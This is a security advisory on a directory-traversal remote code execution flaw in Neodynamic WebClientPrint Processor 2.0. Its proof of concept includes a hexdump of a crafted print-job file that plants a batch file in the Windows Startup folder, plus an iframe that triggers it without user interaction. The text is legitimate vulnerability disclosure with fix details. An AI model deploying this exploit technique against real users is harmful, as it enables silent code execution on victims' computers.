Advisory: WebClientPrint Processor 2.0: Remote Code Execution via Print Jobs

RedTeam Pentesting discovered that malicious print jobs can be used to
trigger a remote code execution vulnerability in WebClientPrint
Processor (WCPP). These print jobs may be distributed via specially
crafted websites and are processed without any user interaction as soon
as the website is accessed.

Details
=======

Product: Neodynamic WebClientPrint Processor
Affected Versions: 2.0.15.109 (Microsoft Windows)
Fixed Versions: >= 2.0.15.910
Vulnerability Type: Remote Code Execution
Security Risk: high
Vendor URL: http://www.neodynamic.com/
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2015-008
Advisory Status: published
CVE: GENERIC-MAP-NOMATCH
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH


Introduction
============

Neodynamic's WebClientPrint Processor is a client-side application which
allows server-side applications to print documents on a client's printer
without user interaction, bypassing the browser's print functionality.
The server-side application may be written in ASP.NET or PHP while on
the client-side multiple platforms and browsers are supported.

"Send raw data, text and native commands to client printers without
showing or displaying any print dialog box!" (Neodynamic's website)


More Details
============

Upon installation under Microsoft Windows, WCPP registers itself as a
handler for the "webclientprint" URL scheme. Thus, any URL starting with
"webclientprint:" is handled by WCPP. For example, entering

webclientprint:-about

in the URL bar of a browser opens the about box of WCPP.

In order to automatically print a text file using WCPP, a URL such as
the following is requested (e.g. via JavaScript code or an iframe HTML
tag in a website):

webclientprint:https://example.com/somedir/lorem.txt

The file lorem.txt conforms to Neodynamic's proprietary file format CPJ
and contains the following data:

-----------------------------------------------------------------------
$ xxd lorem.txt
00000000: 6370 6a02 fc0b 0000 070c 0000 7763 7050  cpj.........wcpP
00000010: 463a 6632 3330 6262 3766 3965 3338 3437  F:f230bb7f9e3847
00000020: 3633 6132 3765 6663 3565 6237 6633 6436  63a27efc5eb7f3d6
00000030: 6661 2e54 5854 7c50 7269 6e74 6564 2042  fa.TXT|Printed B
00000040: 7920 5765 6243 6c69 656e 7450 7269 6e74  y WebClientPrint
00000050: 0d0a 3d3d 3d3d 3d3d 3d3d 3d3d 3d3d 3d3d  ..==============
00000060: 3d3d 3d3d 3d3d 3d3d 3d3d 3d0d 0a0d 0a4c  ===========....L
00000070: 6f72 656d 2069 7073 756d 2064 6f6c 6f72  orem ipsum dolor
00000080: 2073 6974 2061 6d65 742c 2063 6f6e 7365   sit amet, conse
00000090: 6374 6574 7572 2061 6469 7069 7363 696e  ctetur adipiscin
000000a0: 6720 656c 6974 2e20 4675 7363 6520 7572  g elit. Fusce ur
[...]
00000bc0: 6275 6c75 6d20 7675 6c70 7574 6174 6520  bulum vulputate
00000bd0: 6d61 676e 6120 6772 6176 6964 6120 6e65  magna gravida ne
00000be0: 7175 6520 696d 7065 7264 6965 7420 6163  que imperdiet ac
00000bf0: 2076 6976 6572 7261 206e 756c 6c61 2073   viverra nulla s
00000c00: 7573 6369 7069 742e 0150 4446 4372 6561  uscipit..PDFCrea
00000c10: 746f 7241 636f 7069 616e 2054 6563 686e  torAcopian Techn
00000c20: 6963 616c 2043 6f6d 7061 6e79 202d 2031  ical Company - 1
00000c30: 2057 6562 4170 7020 4c69 6320 2d20 3220   WebApp Lic - 2
00000c40: 5765 6253 6572 7665 7220 4c69 637c xxxx  WebServer Lic|xx
00000c50: xxxx xxxx xxxx xxxx xxxx xxxx xxxx xxxx  xxxxxxxxxxxxxxxx
00000c60: xxxx xxxx xxxx xxxx xxxx xxxx xxxx xxxx  xxxxxxxxxxxxxxxx
00000c70: xxxx xxxx xxxx                           xxxxxx
-----------------------------------------------------------------------

It was obtained from Neodynamic's online demo website[0]. Briefly, its
structure can be described as follows:

Offset   Size                                                     Usage
-----------------------------------------------------------------------
      0     3                                         magic bytes "cpj"
      3     1                                                   unknown
      4     4         offset "pc" (32 bit LE) for printer configuration
      8     4                   offset "lk" (32 bit LE) for license key
   0x0c     6                          filename/content header "wcpPF:"
   0x12     -    filename and content separated by pipe ("|") character
pc+0x12     -                                     printer configuration
lk+0x12     -                                               license key

In the example above, the file "f230bb7f9e384763a27efc5eb7f3d6fa.TXT"
would be printed on the printer with the name "PDFCreator". The license
key at the end of the file was intentionally redacted. Prior to
printing, the text file with the dummy content is created in the current
user's %TEMP% directory. Typically, this directory is located at:

C:\Users\<user>\AppData\Local\Temp\


Proof of Concept
================

During RedTeam Pentesting's analysis of WCPP it was found that malicious
CPJ files can be crafted that exploit a directory traversal bug in WCPP.
Such an example is given in the following hexdump, showing the file
rce-user.txt:

-----------------------------------------------------------------------
$ xxd rce-user.txt
00000000: 6370 6a02 0201 0000 0301 0000 7763 7050  cpj.........wcpP
00000010: 463a 2e2e 5c2e 2e5c 526f 616d 696e 675c  F:..\..\Roaming\
00000020: 4d69 6372 6f73 6f66 745c 5769 6e64 6f77  Microsoft\Window
00000030: 735c 5374 6172 7420 4d65 6e75 5c50 726f  s\Start Menu\Pro
00000040: 6772 616d 735c 5374 6172 7475 705c 5265  grams\Startup\Re
00000050: 6454 6561 6d2e 6261 747c 4065 6368 6f20  dTeam.bat|@echo
00000060: 6f66 660d 0a63 6c73 0d0a 6563 686f 2e0d  off..cls..echo..
00000070: 0a65 6368 6f20 5072 6f6f 662d 6f66 2d43  .echo Proof-of-C
00000080: 6f6e 6365 7074 0d0a 6563 686f 202d 2d2d  oncept..echo ---
00000090: 2d2d 2d2d 2d2d 2d2d 2d2d 2d2d 2d0d 0a65  -------------..e
000000a0: 6368 6f20 5265 6d6f 7465 2043 6f64 6520  cho Remote Code
000000b0: 4578 6563 7574 696f 6e20 7669 6120 5765  Execution via We
000000c0: 6243 6c69 656e 7450 7269 6e74 2076 322e  bClientPrint v2.
000000d0: 302e 3135 2e31 3039 0d0a 464f 5220 2f4c  0.15.109..FOR /L
000000e0: 2025 2578 2049 4e20 2831 2c31 2c31 3829   %%x IN (1,1,18)
000000f0: 2044 4f20 6563 686f 2e0d 0a73 7461 7274   DO echo...start
00000100: 2063 616c 630d 0a70 6175 7365 0d0a 007c   calc..pause...|
-----------------------------------------------------------------------

In this example the filename is set to

..\..\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RedTeam.bat

which is appended to the %TEMP% directory as follows:

C:\Users\<user>\AppData\Local\Temp\..\..\Roaming\Microsoft\Windows\
Start Menu\Programs\Startup\RedTeam.bat

After resolving the "..\..\" sequence contained in the filename, this
yields the following path:

C:\Users\<user>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
Startup\RedTeam.bat

As a consequence, the file content beginning at 0x5a is written to the
file RedTeam.bat in the current user's Startup folder. Therefore,
RedTeam.bat will be executed once the affected user logs in again. As a
proof of concept, a text will be displayed and Windows' calculator is
executed.

On one hand, this exploit can be executed when the following URL is
entered into the URL bar of a browser:

webclientprint:https://example.com/somedir/rce-user.txt

On the other hand, visiting users of a malicious website may be attacked
without user interaction when the webclientprint URL is embedded into an
iframe as follows:

-----------------------------------------------------------------------
<html>
<body>
<iframe src="webclientprint:https://example.com/somedir/rce-user.txt">
</iframe>
</body>
</html>
-----------------------------------------------------------------------

The proof of concept printed above contains no valid license key, so a
notification window is shown when the exploit is executed. However, this
does not prevent successful exploitation. Attackers can easily add a
valid license key (e.g. by buying a license), so the window is not shown
and there is no visual indication of exploitation anymore.

The proof of concept is designed to print using the default printer.
Since WCPP does not seem to know how to print batch files, it exits
silently with the result that a successful attack does not print the
batch file.


Workaround
==========

Affected users should disable the WCPP handler and upgrade to a fixed
version as soon as possible.


Fix
===

Install a WCPP version greater or equal to 2.0.15.910[1].


Security Risk
=============

If a user of WCPP visits an attacker-controlled website, arbitrary code
can be executed on the attacked user's computer. If a valid license key
is provided, there is no visual indication of the ongoing attack.
Furthermore, no user interaction is required to trigger the
vulnerability once a malicious website is visited. It is therefore
estimated that this vulnerability poses a high risk.


Timeline
========

2015-08-24 Vulnerability identified
2015-09-03 Customer approved disclosure to vendor
2015-09-04 Asked vendor for security contact
2015-09-04 CVE number requested
2015-09-04 Vendor responded with security contact
2015-09-07 Vendor notified
2015-09-07 Vendor acknowledged receipt of advisory
2015-09-15 Vendor released fixed version
2015-09-16 Customer asked to wait with advisory release until all their
           clients are updated
2017-07-31 Customer approved advisory release
2017-08-22 Advisory released


References
==========

[0] http://webclientprint.azurewebsites.net/
[1] https://neodynamic.wordpress.com/2015/09/15/webclientprint-2-0-for-windows-clients-critical-update/


RedTeam Pentesting GmbH
=======================

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at:
https://www.redteam-pentesting.de/


Working at RedTeam Pentesting
=============================

RedTeam Pentesting is looking for penetration testers to join our team
in Aachen, Germany. If you are interested please visit:
https://www.redteam-pentesting.de/jobs/

-- 
RedTeam Pentesting GmbH                   Tel.: +49 241 510081-0
Dennewartstr. 25-27                       Fax : +49 241 510081-99
52068 Aachen                    https://www.redteam-pentesting.de
Germany                         Registergericht: Aachen HRB 14004
Geschaftsfuhrer:                       Patrick Hof, Jens Liebchen